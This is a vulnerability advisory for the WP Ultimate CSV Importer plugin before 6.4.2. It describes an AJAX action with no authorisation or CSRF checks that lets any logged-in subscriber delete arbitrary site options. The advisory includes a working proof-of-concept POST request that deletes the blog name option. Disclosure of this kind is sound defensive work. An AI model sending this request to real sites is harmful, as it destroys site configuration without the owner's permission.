WP Ultimate CSV Importer < 6.4.2 – Subscriber+ Arbitrary Option Deletion | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks when deleting options via the disable_main_mode AJAX action, and does not ensure that the option to be delete belong to the plugin. As a result, any authenticated user, such as subscriber, could delete arbitrary options from the blog

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [any authenticated user]

action=disable_main_mode&option=blogname

Affects Plugins

wp-ultimate-csv-importer

Fixed in 6.4.2

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

06a98f51-e581-4e42-8287-7c18254d100c

Timeline

Publicly Published

2022-01-17 (about 3 years ago)

Added

2022-01-17 (about 3 years ago)

Last Updated

2022-01-17 (about 3 years ago)

Other

Published

Title

Published

2023-11-21

Title

UserPro < 5.1.2 - Missing Authorization via multiple functions

Published

2022-10-30

Title

Corsa <= 1.5 - Subscriber+ Arbitrary Plugin Installation

Published

2024-02-06

Title

Podlove Podcast Publisher < 4.0.12 - Missing Authorization to Settings Import

Published

2025-09-26

Title

TheGem (Elementor) <= 5.10.5 - Missing Authorization

Published

2024-04-22

Title

ARForms < 6.4.1 - Missing Authorization to Arbitrary Plugin Activation/Deactivation